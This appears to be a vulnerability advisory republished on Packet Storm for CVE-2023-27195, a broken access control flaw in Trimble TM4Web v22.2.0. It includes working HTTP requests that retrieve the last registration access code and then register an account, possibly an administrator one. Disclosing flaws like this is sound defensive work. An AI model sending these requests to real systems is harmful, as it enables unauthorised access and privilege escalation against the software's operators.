An access control issue in Trimble TM4Web version 22.2.0 allows unauthenticated attackers to access a specific crafted URL path to retrieve the last registration access code and use this access code to register a valid account. If the access code was used to create an Administrator account, attackers are also able to register new Administrator accounts with full rights and privileges.
f463a33e91d671de7054018540aff6f6ec53938dedf239b9646be10f49edfccfCVE ID: CVE-2023-27195
Description:
An access control issue in Trimble TM4Web v22.2.0 allows
unauthenticated attackers to access a specific crafted URL path to
retrieve the last registration access code and use this access code to
register a valid account. If the access code was used to create an
Administrator account, attackers are also able to register new
Administrator accounts with full rights and privileges.
Vulnerability Type: Broken Access Control
Vendor of Product: Trimble - Transportation
(https://transportation.trimble.com/products/TM4Web)
Affected Product Code Base: TM4Web v22.2.0
Affected Component: User registration process
Attack Type: Remote
Impact: Privilege escalation / authentication bypass
Attack Vectors:*1. Accessing the last access code *
GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=
Host: example.host.com
*2. Sending PUT request to create a new user account with previously
retrieved access code*
PUT /inc/tm_ajax.msw
Host: example.host.com [...]
WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test@gmail.com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser
Discoverer: Clément Cruchet (lutzenfried)
References:
- Official website: https://transportation.trimble.com/products/TM4Web
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed